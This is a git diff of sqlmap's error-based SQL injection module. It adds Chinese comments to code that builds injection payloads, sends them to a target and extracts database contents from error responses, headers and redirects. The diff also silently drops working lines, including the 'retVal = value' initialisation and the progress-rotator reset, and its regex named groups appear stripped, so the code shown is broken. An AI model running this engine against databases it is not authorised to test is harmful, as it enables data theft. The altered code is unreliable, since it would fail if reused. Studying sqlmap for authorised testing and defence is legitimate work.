diff --git a/src/sqlmap-master/lib/techniques/error/use.py b/src/sqlmap-master/lib/techniques/error/use.py index 7089292..61a326c 100644 --- a/src/sqlmap-master/lib/techniques/error/use.py +++ b/src/sqlmap-master/lib/techniques/error/use.py @@ -5,6 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ +# 导入需要的模块 from __future__ import print_function import re @@ -63,98 +64,127 @@ from lib.utils.safe2bin import safecharencode from thirdparty import six def _oneShotErrorUse(expression, field=None, chunkTest=False): - offset = 1 - rotator = 0 - partialValue = None - threadData = getCurrentThreadData() - retVal = hashDBRetrieve(expression, checkConf=True) - + """ + 执行单次基于错误的SQL注入查询 + + 参数: + expression - 要执行的SQL表达式 + field - 要查询的字段名(可选) + chunkTest - 是否为分块测试模式(用于确定最佳查询长度) + + 返回: + 查询结果 + """ + + # 初始化变量 + offset = 1 # 结果偏移量,用于分块获取数据 + rotator = 0 # 旋转字符索引,用于显示进度 + partialValue = None # 存储部分查询结果 + threadData = getCurrentThreadData() # 获取当前线程数据 + retVal = hashDBRetrieve(expression, checkConf=True) # 尝试从缓存中获取结果 + + # 如果缓存的结果包含部分值标记,则提取部分值 if retVal and PARTIAL_VALUE_MARKER in retVal: partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) - offset += len(partialValue) + offset += len(partialValue) # 调整偏移量继续获取剩余数据 + # 标记是否从缓存恢复数据 threadData.resumed = retVal is not None and not partialValue + # 对特定数据库进行错误分块长度检测 + # 这是为了找到最佳的查询长度,避免数据库截断结果 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: debugMsg = "searching for error chunk length..." logger.debug(debugMsg) - seen = set() - current = MAX_ERROR_CHUNK_LENGTH + seen = set() # 记录已测试过的长度 + current = MAX_ERROR_CHUNK_LENGTH # 从最大长度开始测试 + + # 二分查找最佳长度 while current >= MIN_ERROR_CHUNK_LENGTH: - testChar = str(current % 10) + testChar = str(current % 10) # 测试字符 + # 根据不同数据库构造测试查询 if Backend.isDbms(DBMS.ORACLE): testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar) else: testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery) + # 执行测试查询 result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) seen.add(current) + # 分析测试结果确定分块长度 if (result or "").startswith(testChar): if result == testChar * current: - kb.errorChunkLength = current + kb.errorChunkLength = current # 找到合适的长度 break else: result = re.search(r"\A\w+", result).group(0) candidate = len(result) - len(kb.chars.stop) current = candidate if candidate != current and candidate not in seen else current - 1 else: - current = current // 2 + current = current // 2 # 二分缩小范围 + # 保存找到的分块长度 if kb.errorChunkLength: hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) else: kb.errorChunkLength = 0 + # 如果没有缓存结果或者有部分值,执行实际查询 if retVal is None or partialValue: try: while True: - check = r"(?si)%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - trimCheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start + # 定义用于提取结果的正则表达式 + check = r"(?si)%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) # 完整结果匹配 + trimCheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start # 截断结果匹配 + # 处理字段转换 if field: - nulledCastedField = agent.nullAndCastField(field) + nulledCastedField = agent.nullAndCastField(field) # 转换字段格式 + # 对特定数据库进行分块处理 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) - if extendedField != field: # e.g. MIN(surname) + if extendedField != field: # 处理聚合函数,如MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) - # Forge the error-based SQL injection request - vector = getTechniqueData().vector - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - injExpression = expression.replace(field, nulledCastedField, 1) if field else expression - injExpression = unescaper.escape(injExpression) - injExpression = query.replace("[QUERY]", injExpression) - payload = agent.payload(newValue=injExpression) + # 构造注入payload + vector = getTechniqueData().vector # 获取注入向量 + query = agent.prefixQuery(vector) # 添加前缀 + query = agent.suffixQuery(query) # 添加后缀 + injExpression = expression.replace(field, nulledCastedField, 1) if field else expression # 替换字段 + injExpression = unescaper.escape(injExpression) # 转义特殊字符 + injExpression = query.replace("[QUERY]", injExpression) # 构造最终查询 + payload = agent.payload(newValue=injExpression) # 生成payload - # Perform the request + # 发送HTTP请求 page, headers, _ = Request.queryPage(payload, content=True, raise404=False) - incrementCounter(getTechnique()) + incrementCounter(getTechnique()) # 增加计数器 + # 处理特殊字符转义 if page and conf.noEscape: page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) - # Parse the returned page to get the exact error-based - # SQL injection output + # 从返回内容中提取结果 output = firstNotNone( - extractRegexResult(check, page), - extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), - extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), - extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + extractRegexResult(check, page), # 从页面内容提取 + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), # 从错误信息提取 + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), # 从响应头提取 + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) # 从重定向信息提取 ) + # 处理输出结果 if output is not None: - output = getUnicode(output) + output = getUnicode(output) # 转换为Unicode else: + # 处理被截断的结果 trimmed = firstNotNone( extractRegexResult(trimCheck, page), extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), @@ -163,12 +193,14 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): ) if trimmed: + # 警告可能的结果截断 if not chunkTest: warnMsg = "possible server trimmed output detected " warnMsg += "(due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warning(warnMsg) + # 尝试提取部分结果 if not kb.testMode: check = r"(?P[^<>\n]*?)%s" % kb.chars.stop[:2] output = extractRegexResult(check, trimmed, re.IGNORECASE) @@ -179,78 +211,105 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): else: output = output.rstrip() + # 处理不同数据库的结果拼接 if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)): if offset == 1: - retVal = output + retVal = output # 第一块直接赋值 else: - retVal += output if output else '' + retVal += output if output else '' # 后续块拼接 + # 判断是否需要继续获取下一块 if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: - offset += kb.errorChunkLength + offset += kb.errorChunkLength # 增加偏移量 else: - break + break # 获取完成 + # 显示进度 if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)): - if kb.fileReadMode: + if kb.fileReadMode: # 文件读取模式 dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) - elif offset > 1: + elif offset > 1: # 显示旋转进度条 rotator += 1 - if rotator >= len(ROTATING_CHARS): rotator = 0 - dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: - retVal = output + retVal = output # 其他数据库直接返回结果 break + except: + # 异常处理,保存部分结果 if retVal is not None: hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise - retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal + # 处理结果编码 + retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal # 十六进制解码 if isinstance(retVal, six.string_types): - retVal = htmlUnescape(retVal).replace("
", "\n") + retVal = htmlUnescape(retVal).replace("
", "\n") # HTML解码 - retVal = _errorReplaceChars(retVal) + retVal = _errorReplaceChars(retVal) # 替换特殊字符 + # 缓存结果 if retVal is not None: hashDBWrite(expression, retVal) else: + # 从缓存结果中提取数据 _ = "(?si)%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): - values = [] - origExpr = None + """ + 获取错误注入查询的字段值 + + 参数: + expression - SQL表达式 + expressionFields - 表达式中的字段 + expressionFieldsList - 字段列表 + num - 行号(可选) + emptyFields - 空字段列表(可选) + suppressOutput - 是否抑制输出 + + 返回: + 字段值列表 + """ + values = [] # 存储所有字段的值 + origExpr = None # 保存原始表达式 - width = getConsoleWidth() - threadData = getCurrentThreadData() + width = getConsoleWidth() # 获取控制台宽度 + threadData = getCurrentThreadData() # 获取当前线程数据 + # 遍历所有字段 for field in expressionFieldsList: output = None + # 跳过ROWNUM字段 if field.startswith("ROWNUM "): continue + # 处理行号限制 if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) + # 替换表达式中的字段 if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) + # 执行查询获取字段值 output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) + # 检查线程是否需要继续 if not kb.threadContinue: return None + # 输出结果 if not any((suppressOutput, kb.bruteMode)): if kb.fileReadMode and output and output.strip(): print() @@ -262,6 +321,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e dataToStdout("%s\n" % status) + # 恢复原始表达式 if isinstance(num, int): expression = origExpr @@ -271,72 +331,96 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e def _errorReplaceChars(value): """ - Restores safely replaced characters + 还原安全替换的字符 + + 参数: + value - 需要还原的字符串 + + 返回: + 还原后的字符串 """ - retVal = value if value: - retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") + # 替换特殊字符 + retVal = retVal.replace(kb.chars.space, " ") # 空格 + retVal = retVal.replace(kb.chars.dollar, "$") # 美元符号 + retVal = retVal.replace(kb.chars.at, "@") # @符号 + retVal = retVal.replace(kb.chars.hash_, "#") # #符号 return retVal def _formatPartialContent(value): """ - Prepares (possibly hex-encoded) partial content for safe console output + 格式化部分内容用于安全的控制台输出 + + 参数: + value - 需要格式化的值 + + 返回: + 格式化后的字符串 """ - if value and isinstance(value, six.string_types): try: - value = decodeHex(value, binary=False) + value = decodeHex(value, binary=False) # 尝试十六进制解码 except: pass finally: - value = safecharencode(value) + value = safecharencode(value) # 安全编码 return value def errorUse(expression, dump=False): """ - Retrieve the output of a SQL query taking advantage of the error-based - SQL injection vulnerability on the affected parameter. + 利用基于错误的SQL注入漏洞获取查询结果 + 这是主要的入口函数 + + 参数: + expression - SQL表达式 + dump - 是否为转储模式 + + 返回: + 查询结果 """ - + # 初始化注入技术 initTechnique(getTechnique()) - abortedFlag = False - count = None - emptyFields = [] - start = time.time() - startLimit = 0 - stopLimit = None - value = None + # 初始化变量 + abortedFlag = False # 中断标记 + count = None # 结果计数 + emptyFields = [] # 空字段列表 + start = time.time() # 开始时间 + startLimit = 0 # 起始限制 + stopLimit = None # 结束限制 + value = None # 结果值 + # 获取表达式字段信息 _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - # Set kb.partRun in case the engine is called from the API + # 设置部分运行标记(API模式) kb.partRun = getPartRun(alias=False) if conf.api else None - # We have to check if the SQL query might return multiple entries - # and in such case forge the SQL limiting the query output one - # entry at a time - # NOTE: we assume that only queries that get data from a table can - # return multiple entries + # 检查SQL查询是否可能返回多条记录 if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): + # 添加限制条件 expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: - # Count the number of SQL query entries output + # 计算查询结果数量 countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) + # 移除ORDER BY子句(计数时不需要) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] + # 获取计数结果 _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields)) + # 处理结果数量 if isNumPosStrValue(count): + # 限制最大结果数 if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: @@ -347,6 +431,7 @@ def errorUse(expression, dump=False): logger.debug(debugMsg) elif count and not count.isdigit(): + # 无法计数时假设只有一条结果 warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " @@ -356,15 +441,18 @@ def errorUse(expression, dump=False): stopLimit = 1 elif not isNumPosStrValue(count): + # 处理空结果 if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warning(warnMsg) else: - value = [] # for empty tables + value = [] # 空表 return value + # 多线程处理多条记录 if isNumPosStrValue(count) and int(count) > 1: + # 询问是否移除ORDER BY以提高速度 if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: message = "due to huge table size do you want to remove " message += "ORDER BY clause gaining speed over consistency? [y/N] " @@ -372,26 +460,30 @@ def errorUse(expression, dump=False): if readInput(message, default='N', boolean=True): expression = expression[:expression.index(" ORDER BY ")] + # 设置线程数 numThreads = min(conf.threads, (stopLimit - startLimit)) threadData = getCurrentThreadData() try: + # 创建结果范围迭代器 threadData.shared.limits = iter(xrange(startLimit, stopLimit)) except OverflowError: errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) errMsg += "with switch '--fresh-queries'" raise SqlmapDataException(errMsg) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + # 初始化共享数据 + threadData.shared.value = BigArray() # 存储结果 + threadData.shared.buffered = [] # 缓冲区 + threadData.shared.counter = 0 # 计数器 + threadData.shared.lastFlushed = startLimit - 1 # 最后刷新位置 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 # 是否显示进度 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + # 检查空列 if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): for field in expressionFieldsList: if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': @@ -400,17 +492,23 @@ def errorUse(expression, dump=False): debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) + # 对大量数据禁用恢复信息显示 if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) + # 执行多线程查询 try: def errorThread(): + """ + 错误注入查询线程函数 + """ threadData = getCurrentThreadData() while kb.threadContinue: + # 获取下一个查询范围 with kb.locks.limit: try: threadData.shared.counter += 1 @@ -418,51 +516,63 @@ def errorUse(expression, dump=False): except StopIteration: break + # 执行查询 output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) if not kb.threadContinue: break + # 处理单值结果 if output and isListLike(output) and len(output) == 1: output = unArrayizeValue(output) + # 保存结果 with kb.locks.value: index = None if threadData.shared.showEta: threadData.shared.progress.progress(threadData.shared.counter) + # 按顺序插入结果 for index in xrange(1 + len(threadData.shared.buffered)): if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, output)) + # 刷新连续的结果 while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: threadData.shared.lastFlushed += 1 threadData.shared.value.append(threadData.shared.buffered[0][1]) del threadData.shared.buffered[0] + # 运行多线程 runThreads(numThreads, errorThread) except KeyboardInterrupt: + # 处理用户中断 abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warning(warnMsg) finally: + # 保存剩余结果 threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) value = threadData.shared.value kb.suppressResumeInfo = False + # 单条记录查询 if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) + # 处理返回结果格式 if value and isListLike(value): if len(value) == 1 and isinstance(value[0], (six.string_types, type(None))): - value = unArrayizeValue(value) + value = unArrayizeValue(value) # 单值结果 elif len(value) > 1 and stopLimit == 1: - value = [value] + value = [value] # 多值结果 + # 计算执行时间 duration = calculateDeltaSeconds(start) + # 输出调试信息 if not kb.bruteMode: debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[getTechnique()], 'y' if kb.counters[getTechnique()] == 1 else "ies", duration) logger.debug(debugMsg)